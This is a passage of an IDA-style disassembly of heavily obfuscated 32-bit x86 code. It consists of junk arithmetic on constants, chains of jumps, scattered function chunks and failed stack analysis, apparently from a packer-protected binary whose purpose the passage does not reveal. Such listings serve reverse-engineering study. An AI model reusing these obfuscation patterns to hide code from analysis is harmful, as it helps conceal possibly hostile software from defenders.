		push	offset loc_4507C0
		jmp	locret_43D27F
; ---------------------------------------------------------------------------

loc_458EF0:				; CODE XREF: hvvrg7ie:00442830j
					; hvvrg7ie:loc_443114j
		mov	eax, 62h
		call	sub_457C82
		jmp	loc_449CF3
; ---------------------------------------------------------------------------

loc_458EFF:				; CODE XREF: hvvrg7ie:0043989Fj
					; hvvrg7ie:00441565j ...
		jz	loc_45075A
		push	esi
		push	0A47DBD1Bh
		pop	esi
		jmp	loc_459053
; ---------------------------------------------------------------------------
		push	0C3780675h
		pop	eax
		rol	eax, 14h
		xor	eax, 70594A50h
		sub	eax, 8EE6AD3Fh
		xor	eax, 6A0F1487h
		push	edi
		pushf
		jmp	loc_4477F0

; =============== S U B	R O U T	I N E =======================================



sub_458F33	proc near		; CODE XREF: sub_443BCD:loc_44671Ej
					; sub_447D56:loc_44CDFCp ...

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 00439451 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00439D6F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043BE0D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E712 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441413 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004459B6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448EAE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449917 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449DEA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C850 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004513B9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045222D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004529E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455AB1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00457696 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00457F1F SIZE 0000000E BYTES

		call	sub_44A4D4

loc_458F38:				; CODE XREF: sub_451482:loc_43BEB4j
		jnz	loc_439D6F
		jmp	loc_459EEA
sub_458F33	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_458F43	proc near		; CODE XREF: hvvrg7ie:00442E37j
					; sub_448768+7p

; FUNCTION CHUNK AT 00456475 SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	ebp, esp
		push	ecx
		mov	byte ptr [ebp-1], 0
		jmp	loc_456475
sub_458F43	endp


; =============== S U B	R O U T	I N E =======================================



sub_458F53	proc near		; DATA XREF: hvvrg7ie:0043CF83o

; FUNCTION CHUNK AT 0044F5E9 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045A813 SIZE 00000005 BYTES

		mov	eax, [esp+0]
		push	edx
		call	sub_44C132
		push	1E28E0C6h
		pop	eax
		and	eax, 0CE6D5494h
		sub	eax, 944A3DA1h
		and	eax, 8A60A405h
		jmp	loc_45A813
sub_458F53	endp

; ---------------------------------------------------------------------------

loc_458F79:				; CODE XREF: hvvrg7ie:0044B6DEj
		jns	loc_445D72

; =============== S U B	R O U T	I N E =======================================



sub_458F7F	proc near		; CODE XREF: sub_4466CE+8DC6p

; FUNCTION CHUNK AT 00441C46 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD9D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00452556 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_456DE7
		push	edi
		jmp	loc_441C46
sub_458F7F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_458F8E:				; CODE XREF: sub_4591C3:loc_4455D8j
					; hvvrg7ie:004455E7j
		and	edx, 1BB4FD2Fh
		cmp	edx, 2AB732C5h
		jmp	loc_442C10
; END OF FUNCTION CHUNK	FOR sub_4591C3
; ---------------------------------------------------------------------------
		mov	edx, 0F75CA70h
		call	sub_446A16
		push	eax
		ror	eax, 10h
		push	ebx
		jmp	loc_440744
; ---------------------------------------------------------------------------

loc_458FB3:				; CODE XREF: hvvrg7ie:0043E929j
		adc	edx, edi

loc_458FB5:				; CODE XREF: hvvrg7ie:0043E912j
		add	ecx, 274A2559h
		popf
		xchg	ecx, [esp]
		jmp	loc_450867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CB

loc_458FC4:				; CODE XREF: sub_4440CB+976Ej
		popf
		sub	esi, 0C3514756h
		jmp	loc_447172
; END OF FUNCTION CHUNK	FOR sub_4440CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3E8

loc_458FD0:				; CODE XREF: sub_44D3E8-EF91j
		sub	al, 99h
		mov	edx, [ebp-4]
		push	offset loc_4500D0
		jmp	loc_447E0C
; END OF FUNCTION CHUNK	FOR sub_44D3E8

; =============== S U B	R O U T	I N E =======================================



sub_458FDF	proc near		; DATA XREF: sub_43D531+A729o
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_308
sub_458FDF	endp


; =============== S U B	R O U T	I N E =======================================



sub_458FE7	proc near		; CODE XREF: sub_41764F+1Dp
					; sub_417722+1Bp
					; DATA XREF: ...
		push	offset loc_45001A
		jmp	nullsub_354
sub_458FE7	endp

; ---------------------------------------------------------------------------

loc_458FF1:				; CODE XREF: hvvrg7ie:00443525j
		jle	near ptr dword_43C2F4+0Fh
		cdq
		jmp	sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_458FFD:				; CODE XREF: sub_444BE1+5B6Bj
		jbe	loc_452C5B
		mov	[ebp+0], edi
		add	esi, 67B80154h

loc_45900C:				; CODE XREF: sub_444BE1:loc_43F855j
		push	offset sub_450BDE
		jmp	nullsub_487
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_459016:				; CODE XREF: sub_44AB90+96C0j
		jz	loc_44070C
; END OF FUNCTION CHUNK	FOR sub_44AB90
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_45901C:				; CODE XREF: sub_43B6A5:loc_44F7DAj
		jmp	loc_44D709
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		cdq
		shr	edx, 1
		jmp	sub_4508B6
; ---------------------------------------------------------------------------
		xchg	ebx, [ecx]
		mov	ecx, eax
		jmp	sub_44C19A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_459032:				; CODE XREF: sub_447ACD+6j
					; sub_44DB53+10j
		jnz	loc_452A2D
		jmp	loc_4517F9
; END OF FUNCTION CHUNK	FOR sub_44DB53

; =============== S U B	R O U T	I N E =======================================



sub_45903D	proc near		; CODE XREF: sub_43D910:loc_43B4A8p
					; hvvrg7ie:0044CCA2j
		xchg	ebx, [esp+0]

loc_459040:				; CODE XREF: hvvrg7ie:0044742Aj
		pop	ebx
		push	edi
		push	73FEE470h
		pop	edi
		xor	edi, 0A22A68ECh
		jmp	loc_44D50E
sub_45903D	endp

; ---------------------------------------------------------------------------

loc_459053:				; CODE XREF: hvvrg7ie:00458F0Cj
		rol	esi, 3
		xor	esi, 894C8D69h
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_45905C:				; CODE XREF: sub_43D531:loc_44D945j
		rol	esi, 6
		and	esi, 0E7F84687h
		jmp	loc_44BF74
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------

loc_45906A:				; CODE XREF: hvvrg7ie:00450D88j
		jp	loc_439465

; =============== S U B	R O U T	I N E =======================================



sub_459070	proc near		; CODE XREF: sub_442ADB+868Ep

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		add	edi, 8E0FC0F2h
		xchg	edi, [esp-4+arg_0]
		jmp	sub_43E7F3
sub_459070	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_459082:				; CODE XREF: sub_453405-10821j
		call	sub_43CFCA

loc_459087:				; CODE XREF: sub_443BCD+72B7j
		jmp	loc_441B36
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------

loc_45908C:				; CODE XREF: hvvrg7ie:0043E984j
		jmp	loc_43A415
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_459091:				; CODE XREF: hvvrg7ie:loc_44E36Fj
					; hvvrg7ie:0044E391j ...
		rol	eax, 1Dh
		or	eax, 0A865B9h
		test	eax, 10h
		jmp	loc_454C59
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_4590A5:				; CODE XREF: sub_43C290:loc_446279j
					; sub_451E1C-3E97j ...
		ror	eax, 2
		push	offset loc_459315
		jmp	loc_44E0FA
; END OF FUNCTION CHUNK	FOR sub_43C290

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4590B2	proc near		; CODE XREF: sub_4506F9+5j
		retn
sub_4590B2	endp

; ---------------------------------------------------------------------------
		or	ebx, edx
		jge	loc_44BF79
		jmp	sub_44B524
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4590C0:				; CODE XREF: sub_4465A6:loc_457FC7j
		cmp	edx, 6F9E14B9h
		jmp	loc_43C533
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_4590CB:				; DATA XREF: sub_44B3F1-EA38o
		add	eax, 0AC9A1300h
		mov	eax, [eax]
		or	eax, eax
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_4590D5:				; CODE XREF: sub_4544DD:loc_43EB77j
		jnz	loc_44B90B
		jmp	loc_43945A
; END OF FUNCTION CHUNK	FOR sub_4544DD

; =============== S U B	R O U T	I N E =======================================



sub_4590E0	proc near		; CODE XREF: sub_45889B:loc_43D3F1p
					; hvvrg7ie:004487ABj

; FUNCTION CHUNK AT 00446082 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00452BE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459972 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045AB64 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		push	0BA008B00h
		pop	ebx
		jmp	loc_452BE0
sub_4590E0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_4590F0:				; CODE XREF: sub_439549+1677Fj
		jbe	loc_450BD3
		xor	esi, 0C09B9AB5h

loc_4590FC:				; CODE XREF: sub_439549:loc_455FF0j
		push	offset sub_44543A
; END OF FUNCTION CHUNK	FOR sub_439549
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_459101:				; CODE XREF: sub_43E60A:loc_445638j
		jmp	loc_451799
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_459106:				; CODE XREF: sub_43B3BE:loc_43925Aj
		jb	loc_44D44B
		jnb	loc_445A3A
		jmp	loc_444BFF
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_459117:				; CODE XREF: sub_454099:loc_446AA7j
					; sub_454099-17A5j
		cmp	dword ptr [ebp-108h], 43776569h

loc_459121:				; CODE XREF: sub_44F4D4:loc_4591BDj
		jnz	loc_4575F8
		jmp	loc_458DBD
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_45912C:				; DATA XREF: sub_4422A8-13E9o
		push	eax
		call	sub_43A87E
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_43DAC6
		lea	eax, [ebp-125h]
		jmp	loc_444EF3
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		push	esi
		push	1E04FC6Ah
		pop	esi
		jmp	loc_442E8B
; ---------------------------------------------------------------------------
		push	ecx
		push	offset sub_4484E1
		jmp	locret_44F2C6
; ---------------------------------------------------------------------------

loc_459164:				; CODE XREF: hvvrg7ie:00454B57j
		xchg	eax, [esp]
		call	sub_4517A3
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_45916C:				; CODE XREF: sub_44E533:loc_43A0B9j
		jmp	loc_459918
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A04B

loc_459171:				; CODE XREF: sub_43A04B+1Dj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43A04B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_459176:				; CODE XREF: sub_4403D4+EEFj
		jg	loc_43C5A2
		cdq
		jb	loc_43ED7E
		jge	loc_4538C8
		jz	loc_45403B

loc_45918F:				; CODE XREF: sub_4403D4:loc_4493B9j
		mov	eax, [ebp+var_4]
		jmp	loc_43FEBB
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------

loc_459197:				; CODE XREF: hvvrg7ie:0044D9D2j
		popf
		xor	edx, ecx
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_45919A:				; CODE XREF: sub_4468C2:loc_44E7CEj
		jmp	loc_43F5F4
; END OF FUNCTION CHUNK	FOR sub_4468C2

; =============== S U B	R O U T	I N E =======================================



sub_45919F	proc near		; DATA XREF: sub_43E741+9o

; FUNCTION CHUNK AT 00442A34 SIZE 00000005 BYTES

		push	0AFFFF7C5h
		push	2
		push	offset sub_447331
		jmp	loc_442A34
sub_45919F	endp

; ---------------------------------------------------------------------------

loc_4591B0:				; CODE XREF: hvvrg7ie:0043DF66j
		sub	esi, 0BBF4EF66h
		test	edi, eax
		jmp	loc_44C963
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F4D4

loc_4591BD:				; CODE XREF: sub_44F4D4+1Fj
		jp	loc_459121
; END OF FUNCTION CHUNK	FOR sub_44F4D4

; =============== S U B	R O U T	I N E =======================================



sub_4591C3	proc near		; CODE XREF: sub_44CA4B+D2D7p

; FUNCTION CHUNK AT 00441FA4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00442C10 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004455D8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044795B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044AFE6 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044FECE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045677A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F8E SIZE 00000011 BYTES

		xchg	edi, [esp+0]
		pop	edi

loc_4591C7:				; CODE XREF: hvvrg7ie:loc_44BDDAj
		push	5A004282h
		pop	edx
		add	edx, 0E812A05Ah
		test	edx, 100h
		jmp	loc_44FECE
sub_4591C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_4591DE:				; CODE XREF: sub_439FEE:loc_43DCA9j
		jnz	loc_44A3B6
; END OF FUNCTION CHUNK	FOR sub_439FEE
; START	OF FUNCTION CHUNK FOR sub_43A7B5

loc_4591E4:				; CODE XREF: sub_43A7B5:loc_43A7C2j
		jmp	loc_456E7D
; END OF FUNCTION CHUNK	FOR sub_43A7B5
; ---------------------------------------------------------------------------
		rol	ebx, 12h
		test	ecx, edi
		jmp	loc_44A3A7
; ---------------------------------------------------------------------------

locret_4591F3:				; CODE XREF: hvvrg7ie:loc_4409A8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DF9

loc_4591F4:				; CODE XREF: sub_447DF9+5957j
		jmp	loc_459FD5
; END OF FUNCTION CHUNK	FOR sub_447DF9
; ---------------------------------------------------------------------------

loc_4591F9:				; CODE XREF: hvvrg7ie:0044533Fj
		jmp	loc_45213A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3D0

loc_4591FE:				; CODE XREF: sub_44B3D0+10j
		push	0CB611A28h

loc_459203:				; CODE XREF: hvvrg7ie:loc_43AC10j
		pop	esi
		or	esi, 702252FEh
		xor	esi, 0CA45BF03h
		add	esi, ebp
		add	esi, 0CED919FFh
		mov	[esi], eax
		jmp	loc_439C4B
; END OF FUNCTION CHUNK	FOR sub_44B3D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_162. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_459220:				; CODE XREF: sub_451E1C:loc_452E34j
		add	esp, 4
		mov	eax, 52h
		push	eax
		push	0CD9ABCC8h
		pop	eax
		xor	eax, 0DE548C65h
		or	eax, 0B3D34646h
		rol	eax, 10h
		jmp	loc_446F4B
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CEB6

loc_459243:				; CODE XREF: sub_43CEB6:loc_444AB7j
					; sub_43CEB6+7C11j
		add	ecx, 8C8F4284h
		jmp	loc_453191
; END OF FUNCTION CHUNK	FOR sub_43CEB6
; ---------------------------------------------------------------------------
		popf
		jbe	loc_4528B5
		jmp	sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_45925A:				; CODE XREF: sub_455087-18E49j
					; sub_455087-131A2j
		push	9ABD068Ch
		pop	eax
		xor	eax, 6850F63Fh
		and	eax, 0CD952A6Dh
		xor	eax, 0F428754Fh
		and	eax, 0FA8F7BEDh
		add	eax, 0C7A70480h
		call	sub_451110

loc_459283:				; CODE XREF: sub_43B3BE+41D0j
		jmp	loc_4551A1
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_459288:				; CODE XREF: sub_442FD1+1652Cj
		add	edi, 234A8470h
		sub	edi, 4398788Dh
		xor	edi, 8B6DB454h
		cmp	edi, 0F35FDDE7h

loc_4592A0:				; CODE XREF: hvvrg7ie:0045843Ej
		jmp	loc_44205E
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_4592A5:				; CODE XREF: sub_443375:loc_446D12j
		add	ecx, 4B401AFFh
		shr	edi, 19h
		jmp	loc_43A218
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_4592B3:				; CODE XREF: sub_445934:loc_441BEBj
		shr	eax, 1Dh
		jmp	loc_45ABB6
; END OF FUNCTION CHUNK	FOR sub_445934

; =============== S U B	R O U T	I N E =======================================



sub_4592BB	proc near		; DATA XREF: hvvrg7ie:00440DADo
		xchg	ebp, [esp+0]
		retn
sub_4592BB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4592BF	proc near		; CODE XREF: sub_44AFD7:loc_4513E6p
		push	offset sub_43B743
		jmp	nullsub_525
sub_4592BF	endp

; ---------------------------------------------------------------------------

loc_4592C9:				; CODE XREF: hvvrg7ie:0043C4D2j
		jnz	loc_44DF18
		not	eax
		sub	esi, 4EF99A56h
		jmp	loc_459E8B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_220. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE01

loc_4592DD:				; CODE XREF: sub_43DE01+1AD4Bj
		jmp	loc_447DC6
; END OF FUNCTION CHUNK	FOR sub_43DE01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4454E1

loc_4592E2:				; CODE XREF: sub_4454E1+12F8j
		jmp	nullsub_360
; END OF FUNCTION CHUNK	FOR sub_4454E1
; ---------------------------------------------------------------------------

loc_4592E7:				; CODE XREF: hvvrg7ie:0044A377j
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		push	offset sub_43D3B5
		jmp	loc_44EE30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44808A

loc_4592F7:				; CODE XREF: sub_44808A+10j
		cmp	al, 0A4h
		jz	loc_441F88
		jmp	loc_456B66
; END OF FUNCTION CHUNK	FOR sub_44808A
; ---------------------------------------------------------------------------

loc_459304:				; CODE XREF: hvvrg7ie:loc_44E37Aj
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		pushf
		push	9EED6837h
		jmp	loc_44FA58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_459315:				; CODE XREF: sub_43AB99:loc_454D96j
					; sub_4590B2j
					; DATA XREF: ...
		jnb	loc_44B543
		sub	eax, 0F873FF58h
		ror	eax, 3
		push	ecx
		call	sub_448620
; END OF FUNCTION CHUNK	FOR sub_43AB99
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_45932A:				; CODE XREF: sub_4465A6-1C75j
		jb	loc_451D0E
		or	edx, 200FB6D6h

loc_459336:				; CODE XREF: sub_4465A6:loc_44052Aj
		push	eax
		lea	eax, dword_4589FC
		push	offset loc_450E64
		jmp	loc_449F83
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		test	eax, 2D2D0DC0h
		jmp	loc_44BD0D
; ---------------------------------------------------------------------------
		dw 0FE81h
		dd 0ADE4DC65h, 0FEF473E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_45935D:				; DATA XREF: sub_43F98C-2779o
		push	esi
		push	offset sub_455D75
		jmp	loc_44045C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_459368:				; CODE XREF: sub_440C61+FA8Aj
		and	ecx, 5F77ED0Ch
		rol	ecx, 15h
		cmp	ecx, 0C4F1EDFh
		jmp	loc_446911
; END OF FUNCTION CHUNK	FOR sub_440C61
; ---------------------------------------------------------------------------

loc_45937C:				; CODE XREF: hvvrg7ie:00457276j
		xchg	edi, [esp]
		pop	edi
		push	edx
		push	7A089ACEh
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_450434

loc_459387:				; CODE XREF: sub_450434:loc_43F35Fj
		jmp	loc_442172
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_45938C:				; CODE XREF: sub_444BE1:loc_4417C1j
		jz	loc_44B6C6
		jmp	loc_446BEB
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_459397:				; CODE XREF: sub_443E56+D355j
		and	eax, 0F814DB5Ah
		xor	eax, 0A456E8A1h
		add	eax, 84BC2E3h
		push	ebx
		pushf
		push	offset sub_43A89A
		jmp	loc_456B61
; END OF FUNCTION CHUNK	FOR sub_443E56

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4593B5	proc near		; CODE XREF: sub_458095-1B8F2j
		retn
sub_4593B5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_4593B6:				; CODE XREF: sub_446D8D:loc_458AF7j
		jnz	loc_4594AD
		jmp	loc_448779
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_4593C1:				; CODE XREF: sub_44A6D7-6710j
		jge	loc_440730

loc_4593C7:				; CODE XREF: sub_44E3B3-99BBj
		jmp	loc_4541B2
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; ---------------------------------------------------------------------------
		jge	loc_43F860
		mov	edi, 0A3F677A3h
		xor	edi, edx
		xor	ebx, esi
		add	ebp, 90BA7E2Dh
; START	OF FUNCTION CHUNK FOR sub_458706

loc_4593E1:				; CODE XREF: sub_458706-DB2Fj
		jmp	loc_440730
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0C9

loc_4593E6:				; CODE XREF: sub_43A0C9:loc_4549E5j
		pop	eax
		jnb	loc_455A75
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_4458D0
; END OF FUNCTION CHUNK	FOR sub_43A0C9
; ---------------------------------------------------------------------------

loc_4593F6:				; CODE XREF: hvvrg7ie:0043D93Cj
		jo	loc_44D3C3
		add	edi, ebx
		jmp	loc_449306
; ---------------------------------------------------------------------------

loc_459403:				; CODE XREF: hvvrg7ie:00452E2Ej
		jnz	loc_44E986
		jmp	loc_4588A7
; ---------------------------------------------------------------------------
		ror	ebx, 15h
		jmp	loc_458094
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC7F

loc_459416:				; CODE XREF: sub_43FC7F+17j
		jge	loc_452CB1
		push	esi
		mov	[edi], edx
		jmp	sub_452CAD
; END OF FUNCTION CHUNK	FOR sub_43FC7F
; ---------------------------------------------------------------------------
		sbb	edi, 0B3A827A7h
		jmp	loc_43BD8C
; ---------------------------------------------------------------------------
		jz	loc_453F05
		jmp	loc_44B144

; =============== S U B	R O U T	I N E =======================================



sub_45943A	proc near		; CODE XREF: hvvrg7ie:0044675Cp
					; hvvrg7ie:0045B8ACj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439BB5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004430DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452145 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457AFC SIZE 00000011 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	0B585036h
		pop	esi
		add	esi, 0FE4B93E9h
		and	esi, 0D32637FAh

loc_459450:				; CODE XREF: hvvrg7ie:loc_44AABBj
		test	esi, 800000h

loc_459456:				; CODE XREF: hvvrg7ie:loc_452F39j
		jmp	loc_439BB5
sub_45943A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447610

loc_45945B:				; CODE XREF: sub_447610+8j
		jnz	loc_458E86

loc_459461:				; CODE XREF: hvvrg7ie:loc_440D86j
		jmp	loc_4589BE
; END OF FUNCTION CHUNK	FOR sub_447610
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_459466:				; CODE XREF: sub_45541B:loc_45176Bj
		jnz	loc_43B6D2
		jmp	loc_43C1BD
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
		test	edi, eax
		jmp	loc_44C8F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_459478:				; CODE XREF: sub_44D4EF+D2EDj
		cdq
		jl	loc_4405A5
		shr	eax, 1Dh
		jmp	loc_43FEF1
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; ---------------------------------------------------------------------------
		mov	ds:dword_43CDBC, eax
		xor	eax, eax
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_45948E:				; CODE XREF: sub_450E01:loc_439E7Cj
		mov	[ebp-4], eax
; END OF FUNCTION CHUNK	FOR sub_450E01
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_459491:				; CODE XREF: sub_453405:loc_43C62Ej
					; sub_44388C:loc_459E6Dj
		jz	loc_43AD1D
		mov	eax, ds:dword_448D10
		push	0DD3265D6h
		pop	edx
		jmp	loc_44D96C
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_4594A7:				; CODE XREF: sub_446D8D-FA9j
		jb	loc_43F4B7

loc_4594AD:				; CODE XREF: sub_446D8D:loc_4593B6j
		push	6DB32E47h
		pop	eax
		or	eax, 0AC9B0387h
		and	eax, 9659A3E9h
		or	eax, 31AEAD5Ch
		add	eax, 4A405084h
		jmp	loc_43DCDB
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------

loc_4594D0:				; CODE XREF: hvvrg7ie:00443581j
		jl	loc_4433F9

; =============== S U B	R O U T	I N E =======================================



sub_4594D6	proc near		; CODE XREF: hvvrg7ie:0043F303p
		xchg	ebx, [esp+0]
		pop	ebx
		dec	eax
		test	eax, eax
		jl	loc_43D9BE
		jmp	loc_454775
sub_4594D6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_4594E8:				; CODE XREF: sub_442FD1-6841j
		xor	eax, 37A4FF9Eh
		add	eax, ebp
		push	edi
		push	4ED3EAF3h
		pop	edi
		or	edi, 0A9259DE4h
		jmp	loc_459288
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_459502:				; CODE XREF: hvvrg7ie:004423DDj
		jno	loc_447590
		and	ebx, esi
		jnp	loc_448AC7
		jmp	loc_453D6A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_459515:				; CODE XREF: sub_43E128:loc_4409D2j
		push	esi
		pushf
		push	73AF3A05h
		pop	esi
		xor	esi, 0F7C5E801h
		test	esi, 200000h
		jmp	loc_439D1A
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_45952E:				; CODE XREF: sub_45493B:loc_4542C0j
		mov	ebp, [edx]
		or	ebx, ecx
		jmp	loc_447994
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------

loc_459537:				; CODE XREF: hvvrg7ie:004530FDj
		jg	loc_44B0CC
		and	eax, edi
		xor	edx, 0B8D4F09Fh

